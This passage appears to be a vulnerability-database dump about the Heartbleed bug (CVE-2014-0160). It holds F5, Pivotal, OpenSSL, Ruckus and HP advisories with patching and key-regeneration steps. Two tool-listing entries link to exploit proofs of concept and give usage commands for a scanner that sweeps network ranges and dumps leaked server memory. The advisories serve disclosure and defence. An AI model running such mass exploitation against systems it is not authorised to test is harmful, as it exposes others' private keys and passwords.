14.x)](<https://support.f5.com/csp/article/K13121>)\n * _**BIG-IP TMOS: Concepts guide**_\n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n\nMitigating this vulnerability\n\nTo mitigate this vulnerability, you should consider the following recommendations:\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n * [K13163: SSL ciphers supported on BIG-IP platforms (11.x - 13.x)](<https://support.f5.com/csp/article/K13163>)\n * [K13171: Configuring the cipher strength for SSL profiles (11.x)](<https://support.f5.com/csp/article/K13171>)\n * [K13187: COMPAT SSL ciphers are no longer included in standard cipher strings](<https://support.f5.com/csp/article/K13187>)\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL.\n\n * <http://heartbleed.com/>\n\n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * [K14783: Overview of the Client SSL profile (11.x - 13.x)](<https://support.f5.com/csp/article/K14783>)\n * [K12463: Overview of F5 Edge products](<https://support.f5.com/csp/article/K12463>)\n * [K13757: BIG-IP Edge Client version matrix](<https://support.f5.com/csp/article/K13757>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n", "modified": "2019-07-30T19:46:00", "published": "2015-02-17T01:30:00", "id": "F5:K15159", "href": "https://support.f5.com/csp/article/K15159", "title": "OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2016-09-26T17:23:23", "bulletinFamily": "software", "description": "**Important**: For the hotfixes noted previously, the included version of OpenSSL has not been changed. F5 has patched the existing version of OpenSSL to resolve this vulnerability. As a result, on a patched BIG-IP system, the OpenSSL version is still OpenSSL 1.0.1e-fips. For more information about installed hotfix versions, refer to SOL13123: Managing BIG-IP product hotfixes (11.x).\n\n**BIG-IP Edge Client fixes** \n\n\nThis issue has been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in BIG-IP APM 11.5.1 HF2, and 11.5.0 HF3. This issue has also been fixed for BIG-IP Edge Clients for Windows, Mac OS, and Linux in an engineering hotfix in other BIG-IP APM versions. You can obtain the engineering hotfix by contacting [F5 Technical Support](<http:// http://www.f5.com/training-support/customer-support/contact/>) and referencing this article number and the associated ID number. Note that engineering hotfixes are intended to resolve a specific software issue until a suitable minor release, maintenance release, or cumulative hotfix rollup release is available that includes the software fix. For more information, refer to SOL8986: F5 software lifecycle policy.\n\nRecommended action\n\nYou can eliminate this vulnerability by running a version listed in the **Versions known to be not vulnerable** column. If the **Versions known to be not vulnerable** column does not list a version that is higher than the version you are running, then no upgrade candidate currently exists.\n\nUpgrading to a version known to be not vulnerable, or taking steps to mitigate this vulnerability, does not eliminate possible damage that may have already occurred as a result of this vulnerability. After upgrading to a version that is known to be not vulnerable, consider the following components that may have been compromised by this vulnerability:\n\nSSL profile certificate/key pairs\n\nThe BIG-IP SSL profiles may reference SSL certificate/key pairs that were compromised. For information about creating new SSL certificate/key pairs for SSL profiles, refer to the following articles:\n\n * SOL14620: Managing SSL certificates for BIG-IP systems\n * SOL14534: Creating SSL certificates and keys with OpenSSL (11.x) \n\n * SOL13579: Generating new default certificate and key pairs for BIG-IP SSL profiles\n\nBIG-IP device certificate/key pairs\n\nThe BIG-IP system may have a device certificate/key pair that was compromised. For information about creating new SSL certificate/key pairs, refer to the following articles:\n\n * SOL9114: Creating an SSL device certificate and key pair using OpenSSL\n * SOL7754: Renewing self-signed device certificates\n\n**Important**: After you generate a new device certificate and private key pair, you will need to re-establish device trusts. In addition, the device certificates are used for GTM sync groups and Enterprise Manager monitoring. As a result, you will need to recreate the GTM sync groups and rediscover devices managed by Enterprise Manager.\n\nCMI certificate/key pairs\n\nThe BIG-IP system may have a CMI certificate/key pair (used for device group communication and synchronization) that was compromised. To regenerate the CMI certificate/key pairs on devices in a device group, and rebuild the device trust, perform the following procedure:\n\n**Impact of procedure**: F5 recommends that you perform this procedure during a maintenance window. This procedure causes the current device to lose connectivity with all other BIG-IP devices. Depending on the device group and traffic group configuration, the connectivity loss may result in an unintentional active-active condition that causes a traffic disruption. To prevent a standby device from going active, set the standby device in the device group to **Force Offline** before performing the procedure. Standby devices that were set to **Force Offline** should be set to **Release Offline** after performing the procedure.\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **Device Management **> **Device Trust** > **Local Domain**.\n 3. Click **Reset Device Trust**.\n 4. Select the **Generate new self-signed authority** option.\n 5. Click **Update** (or **Next**).\n 6. Click **Finished**.\n\nRepeat this procedure for each device in the device group. \n\n\nAfter you complete the device trust reset on all devices, set up the device trust by performing the procedures described in the following articles:\n\n * SOL13649: Creating a device group using the Configuration utility\n * SOL13639: Creating a device group using the Traffic Management Shell\n * SOL13946: Troubleshooting ConfigSync and device service clustering issues (11.x)\n\nThe big3d process \n\n\nThe BIG-IP system may have a vulnerable version of the** big3d **process under the following conditions:\n\n * The BIG-IP GTM system is running 11.5.0 or 11.5.1.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected BIG-IP GTM system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if a BIG-IP GTM system running 11.5.0 or 11.5.1 installs **big3d** 11.5.0 on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n * The Enterprise Manager system is running 3.1.1 HF1 or HF2.\n * The managed BIG-IP system is running a **big3d** process that was updated by an affected Enterprise Manager system. For example, the **big3d** process included by default on a BIG-IP LTM system running 11.4.0 is not vulnerable by itself. However, if an Enterprise Manager system running 3.1.1 HF1 or HF2 installs **big3d** on the BIG-IP LTM system, the BIG-IP LTM system becomes vulnerable due to the affected **big3d **process.\n\n**Affected big3d versions**\n\nThe following **big3d** versions are affected by this vulnerability:\n\n * big3d version 11.5.0.0.0.221 for Linux \n\n * big3d version 11.5.0.1.0.227 for Linux \n\n * big3d version 11.5.1.0.0.110 for Linux \n\n\nFor information about checking the **big3d** version currently installed on the system and installing updated** big3d **versions on managed systems, refer to the following article:\n\n * SOL13703: Overview of big3d version management \n\n\nBIG-IP maintenance and user passwords \n\n\nThe maintenance and user passwords used to access the BIG-IP system may have been compromised. For information about changing user passwords, refer to the following documentation:\n\n * SOL13121: Changing system maintenance account passwords (11.x)\n * BIG-IP TMOS: Concepts guide \n\n\n**Mitigating this vulnerability**\n\nTo mitigate this vulnerability, you should consider the following recommendations: \n\n\n * Consider denying access to the Configuration utility and using only the command line and** tmsh** until the BIG-IP system is updated. If that is not possible, F5 recommends that you access the Configuration utility only over a secure network.\n * If SSL profiles are configured to use COMPAT ciphers, consider reconfiguring the profiles to use ciphers from the NATIVE SSL stack. For information about the NATIVE and COMPAT ciphers, refer to the following articles: \n \n\n * SOL13163: SSL ciphers supported on BIG-IP platforms (11.x)\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL13187: COMPAT SSL ciphers are no longer included in standard cipher strings\n * Virtual servers that do not use SSL profiles and pass SSL traffic through to the back-end web servers will not protect the back-end resource servers. When possible, you should protect back-end resources by using SSL profiles to terminate SSL. For more information about using iRules to protect the back-end servers, refer to the Supplemental Information section.\n\nSupplemental Information\n\n * [CVE-2014-0160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>)\n * <http://heartbleed.com/> \n \n**Important**: The following DevCentral article contains additional information about using iRules to assist in mitigating this vulnerability when terminating TLS traffic on back-end servers. F5 does not officially support the iRules in the following article, and information in the article does not represent a fix for the vulnerability.\n * [DevCentral article: OpenSSL HeartBleed, CVE-2014-0160](<http://devcentral.f5.com/articles/openssl-heartbleed-cve-2014-0160>)\n * SOL14783: Overview of the Client SSL profile (11.x)\n * SOL12463: Overview of F5 Edge products\n * SOL13757: BIG-IP Edge Client version matrix\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n", "modified": "2015-02-16T00:00:00", "published": "2014-04-08T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html", "id": "SOL15159", "title": "SOL15159 - OpenSSL vulnerability CVE-2014-0160", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:48", "bulletinFamily": "software", "description": "CVE-2014-0160 Heartbleed\n\n# \n\nCritical\n\n# Vendor\n\nOpenSSL.org\n\n# Versions Affected\n\n * 1.0.1 through 1.0.1f\n\n# Description\n\nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n# Affected Pivotal Products and Versions\n\n_Severity is critical unless otherwise noted. \n_\n\n * vFabric Web Server 5.0.x, 5.1.x, 5.2.x, 5.3.x\n * vFabric GemFire Native Client 7.0.0.X, 7.0.1.X\n * Pivotal GemFire Native Client 7.0.2.X\n * Pivotal Command Center 2.0.x, 2.1.x\n * Pivotal App Suite Virtual Appliance 1.0.1.3\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * vFabric Web Server users (all versions) should apply the patch including version 1.0.1g of OpenSSL per the instructions posted here as soon as possible.\n * GemFire Native Client 7.0.X users should immediately upgrade to OpenSSL 1.0.1g or later or recompile their existing OpenSSL 1.0.1 installations with the \u2013DOPENSSL_NO_HEARTBEATS option. See [CVE-2014-0160-GemFire-Native-Client](<http://gemfire.docs.pivotal.io/security/CVE-2014-0160-GemFire-Native-Client.pdf>) for more information.\n * Please see [this doc](<http://docs.pivotal.io/pivotalhd/advisories/CVE-2014-0160-Advisory-PCC.pdf>) for Pivotal Command Center.\n * Pivotal App Suite Virtual Appliance 1.0.1.3 users should upgrade to version 1.0.1.5 as soon as possible.\n\n# Credit\n\nThis bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at Codenomicon and Neel Mehta of Google Security, who first reported it to the OpenSSL team. The Codenomicon team found the Heartbleed bug while improving the SafeGuard feature in Codenomicon\u2019s Defensics security testing tools and reported this bug to the NCSC-FI for vulnerability coordination and reporting to the OpenSSL team.\n\n# References\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>\n * <http://www.openssl.org/news/vulnerabilities.html>\n * <http://www.kb.cert.org/vuls/id/720951>\n * <http://heartbleed.com/>\n * <https://access.redhat.com/site/solutions/781793>\n\n# History\n\n2014-Apr-7: Initial vulnerability report published.\n", "modified": "2014-04-10T00:00:00", "published": "2014-04-10T00:00:00", "id": "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940", "href": "https://www.cloudfoundry.org/blog/cve-2014-0160/", "title": "CVE-2014-0160 Heartbleed | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openssl": [{"lastseen": "2016-09-26T17:22:34", "bulletinFamily": "software", "description": "A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64kB of memory to a connected client or server (a.k.a. Heartbleed). This issue did not affect versions of OpenSSL prior to 1.0.1. Reported by Neel Mehta.", "modified": "2014-04-07T00:00:00", "published": "2014-04-07T00:00:00", "id": "OPENSSL:CVE-2014-0160", "href": "https://www.openssl.org/news/vulnerabilities.html", "type": "openssl", "title": "Vulnerability in OpenSSL (CVE-2014-0160)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "kitploit": [{"lastseen": "2019-10-18T09:39:59", "bulletinFamily": "tools", "description": "[  ](<https://2.bp.blogspot.com/-Mbb_SUv_D74/U0XpU8smaLI/AAAAAAAACWI/jTkhKsqAzNE/s1600/heartbleed.png>)\n\n \n \n \n\n\n * A checker (site and tool) for CVE-2014-0160: [ https://github.com/FiloSottile/Heartbleed ](<https://github.com/FiloSottile/Heartbleed>)\n * ** ssltest.py ** : Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [ http://pastebin.com/WmxzjkXJ ](<https://pastebin.com/WmxzjkXJ>)\n * ** SSL Server Test ** [ https://www.ssllabs.com/ssltest/index.html ](<https://www.ssllabs.com/ssltest/index.html>)\n * ** Metasploit Module: ** [ https://github.com/rapid7/metasploit-framework/pull/3206/files ](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n * ** Nmap NSE script: ** Detects whether a server is vulnerable to the OpenSSL Heartbleed: [ https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse ](<https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse>)\n * ** Nmap NSE script: ** Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas [ https://gist.github.com/RealRancor/10140249 ](<https://gist.github.com/RealRancor/10140249>)\n * ** Heartbleeder: ** Tests your servers for OpenSSL: [ https://github.com/titanous/heartbleeder?files=1 ](<https://github.com/titanous/heartbleeder?files=1>)\n * ** Heartbleed Attack POC and Mass Scanner: ** [ https://bitbucket.org/fb1h2s/cve-2014-0160 ](<https://bitbucket.org/fb1h2s/cve-2014-0160>)\n * ** Heartbleed Honeypot Script: ** [ http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt ](<http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt>)\n", "modified": "2014-04-10T00:55:31", "published": "2014-04-10T00:55:31", "id": "KITPLOIT:8800200070735873517", "href": "http://www.kitploit.com/2014/04/collection-of-heartbleed-tools-openssl.html", "title": "Collection of Heartbleed Tools (OpenSSL CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-18T12:33:44", "bulletinFamily": "tools", "description": "[  ](<https://4.bp.blogspot.com/-skuQnYDMoeg/VgyaDSePF2I/AAAAAAAAErQ/_PvtuA7Eobc/s1600/Heartbleed_Scanner.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-4_jmIXJOYP4/VgyazZV8McI/AAAAAAAAErY/0zg4jbkRndU/s1600/Heartbleed%2BScanner.png>)\n\n \n\n\nHeartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written with python. \n\n \n\n\nFor scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable system to check after. \n\n\n \n\n\nHearbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS. \n \n \n git clone https://github.com/hybridus/heartbleedscanner.git\n\n \n** Sample usage ** \n \nTo scan your local 192.168.1.0/24 network for heartbleed vulnerability (https/443) and save the leaks into a file: \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r\n\n \nTo scan the same network against SMTP Over SSL/TLS and randomize the IP addresses \n\n \n \n python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r\n\n \nIf you already have a target list which you created by using nmap/zmap \n\n \n \n python heartbleedscan.py -i targetlist.txt\n\n \n** Dependencies ** \n** \n** Before using Heartbleed Vulnerability Scanner, you should install ** python-netaddr ** package. \n \nCentOS or CentOS-like systems : \n\n \n \n yum install python-netaddr\n\n \nUbuntu or Debian-like systems : \n\n \n \n apt-get insall python-netaddr\n\n \n \n\n\n** [ Download Heartbleed Vulnerability Scanner ](<https://github.com/hybridus/heartbleedscanner>) **\n", "modified": "2015-10-01T09:47:01", "published": "2015-10-01T09:47:01", "id": "KITPLOIT:7942195329946074809", "href": "http://www.kitploit.com/2015/10/heartbleed-vulnerability-scanner.html", "title": "Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)", "type": "kitploit", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nRUCKUS ADVISORY ID 041414\r\n\r\nCustomer release date: April 14, 2014\r\nPublic release date: April 14, 2014\r\n\r\nTITLE\r\n\r\nOpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160\r\n\r\n\r\nSUMMARY\r\n\r\nOpenSSL library is used in Ruckus products to implement various\r\nsecurity related features. A vulnerability has been discovered in\r\nOpenSSL library which may allow an unauthenticated, remote attacker to\r\nretrieve memory in chunks of 64 kilobytes from a connected client or\r\nserver. An exploit could disclose portions of memory containing\r\nsensitive security material such as passwords and private keys.\r\n\r\n\r\nAFFECTED SOFTWARE VERSIONS AND DEVICES\r\n\r\n\r\n Device Affected software\r\n- --------------------- ------------------\r\nSmart Cell Gateway 1.1.x\r\nSmartCell Access Points NOT AFFECTED\r\nZoneDirector Controllers NOT AFFECTED\r\nZoneFlex Access Points NOT AFFECTED\r\n\r\n\r\nAny products or services not mentioned in the table above are not affected\r\n\r\n\r\nDETAILS\r\n\r\nA vulnerability has been discovered in the popular OpenSSL\r\ncryptographic software library. This weakness exists in OpenSSL's\r\nimplementation of the TLS/DTLS (transport layer security protocols)\r\nheartbeat extension (RFC6520). This vulnerability is due to a missing\r\nbounds check in implementation of the handling of the heartbeat\r\nextension. When exploited, this issue may lead to leak of memory\r\ncontents from the server to the client and from the client to the\r\nserver. These memory contents could contain sensitive security\r\nmaterial such as passwords and private keys.\r\n\r\n\r\nIMPACT\r\n\r\nRuckus devices incorporate OpenSSL library to implement various\r\nsecurity related features. Below is list of the affected components:\r\n\r\n- - Administrative HTTPS Interface (Port 8443)\r\n\r\n\r\nCVSS v2 Base Score:5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\n\r\n\r\n \r\nWORKAROUNDS\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical. However, in the event that a patch cannot\r\nimmediately be applied, the following suggestions might help reduce\r\nthe risk:\r\n\r\n - Do not expose administrative interfaces of Ruckus devices to\r\nuntrusted networks such as the Internet.\r\n\r\n - Use a firewall to limit traffic to/from Ruckus device's\r\nadministrative interface to trusted hosts.\r\n\r\n \r\n\r\nSOLUTION\r\n\r\nRuckus recommends that all customers apply the appropriate patch(es)\r\nas soon as practical.\r\n\r\nThe following software builds have the fix (any later builds will also\r\nhave the fix):\r\n\r\n\r\nBranch Software Build\r\n- ------- ------------------\r\n1.1.x 1.1.2.0.142\r\n\r\n\r\n\r\n\r\nDISCOVERY\r\n\r\nThis vulnerability was disclosed online on various sources :\r\n\r\n- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\r\n- - https://www.openssl.org/news/secadv_20140407.txt\r\n- - http://heartbleed.com/\r\n\r\n\r\n\r\n\r\nOBTAINING FIXED FIRMWARE\r\n\r\nRuckus customers can contact Ruckus support to obtain the fixed firmware\r\n\r\nRuckus Support contact list is at:\r\n https://support.ruckuswireless.com/contact-us\r\n\r\n\r\nPUBLIC ANNOUNCEMENTS\r\n\r\nThis security advisory will be made available for public consumption\r\non April 14, 2014 at the following source\r\n\r\nRuckus Website\r\nhttp://www.ruckuswireless.com/security\r\n\r\nSecurityFocus Bugtraq\r\nhttp://www.securityfocus.com/archive/1\r\n\r\n\r\nFuture updates of this advisory, if any, will be placed on Ruckus's\r\nwebsite, but may or may not be actively announced on mailing lists.\r\n\r\nREVISION HISTORY\r\n\r\n Revision 1.0 / 14th April 2014 / Initial release\r\n\r\n\r\nRUCKUS WIRELESS SECURITY PROCEDURES\r\n\r\nComplete information on reporting security vulnerabilities in Ruckus\r\nWireless\r\nproducts, obtaining assistance with security incidents is available at\r\n http://www.ruckuswireless.com/security\r\n \r\n \r\nFor reporting new security issues, email can be sent to\r\nsecurity(at)ruckuswireless.com\r\nFor sensitive information we encourage the use of PGP encryption. Our\r\npublic keys can be\r\nfound at http://www.ruckuswireless.com/security\r\n\r\n \r\nSTATUS OF THIS NOTICE: Final\r\n\r\nAlthough Ruckus cannot guarantee the accuracy of all statements\r\nin this advisory, all of the facts have been checked to the best of our\r\nability. Ruckus does not anticipate issuing updated versions of\r\nthis advisory unless there is some material change in the facts. Should\r\nthere be a significant change in the facts, Ruckus may update this\r\nadvisory.\r\n\r\n\r\n(c) Copyright 2014 by Ruckus Wireless\r\nThis advisory may be redistributed freely after the public release\r\ndate given at\r\nthe top of the text, provided that redistributed copies are complete and\r\nunmodified, including all date and version information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.18 (Darwin)\r\nComment: GPGTools - http://gpgtools.org\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n\r\niQEcBAEBAgAGBQJTTBeuAAoJEFH6g5RLqzh1fRsIAJ9MtudIbdzR7mm/hP0i7boN\r\nMqlHAnFWai1c99UX048I9PSwWzWuEj4/1E4jy4vQqxLG8gO0YbAQiGq4DDGErCU0\r\nAywV+p3Xlcn0SXp0vse/qnhOT0jVOOKXPZSokmoptQXbd28ZOYtGfMJozTvPh2vf\r\nAvGq2B5kciGVhvBc9hdHGhSla/xUr/puIOBKFtNfMuxPujJ62t8g07w2HCB51PL/\r\n5E5MrP4540n3ONZ9+w5h/AeVfvVXsFv25VuElckq6Anzm+iqNRjcWHdync14UqPx\r\n2kXr1E72zRYbY/Z7+QkQuL1REkka+RtGcwbo05u+aEUnPx3E9wvdCHjf6XhxcbI=\r\n=sbsc\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30472", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30472", "title": "RUCKUS ADVISORY ID 041414: OpenSSL 1.0.1 library's "Heart bleed" vulnerability - CVE-2014-0160", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04240206\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04240206\r\nVersion: 1\r\n\r\nHPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-15\r\nLast Updated: 2014-04-15\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP XP P9500 Disk\r\nArray running OpenSSL.This is the OpenSSL vulnerability known as "Heartbleed"\r\nwhich could be exploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101506\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP XP P9500 Disk Array OSS 70-06-00/00 and 70-06-01/00 when running Apache\r\n2.2.24\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP XP P9500 Disk Array. This bulletin will be revised when the\r\nsoftware updates are released.\r\n\r\nThe two versions of Apache available in OSS 70-06-00/00 and 70-06-01/00 are:\r\n\r\nApache 2.2.10 (with OpenSSL 0.9.8o) which is not impacted by CVE-2014-0160\r\nApache 2.2.24 (with OpenSSL 1.0.1e) which is impacted by CVE-2014-0160\r\n\r\nUntil a new version is available, keep the SVP(s) on an array on the earlier\r\nversion of Apache available from the OSS image (version 2.2.10)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 15 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNNOSEACgkQ4B86/C0qfVl7IwCcCAFossT9cI/G1w8Zjt125fWa\r\nwwQAnR+wDpUBjcU/REah/pNV80/+VNeR\r\n=Do3J\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30478", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30478", "title": "[security bulletin] HPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04268240\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04268240\r\nVersion: 1\r\n\r\nHPSBMU03029 rev.1 - HP Insight Control Server Migration running OpenSSL,\r\nRemote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Insight\r\nControl server migration running OpenSSL. This is the OpenSSL vulnerability\r\nknown as "Heartbleed" which could be exploited remotely resulting in\r\ndisclosure of 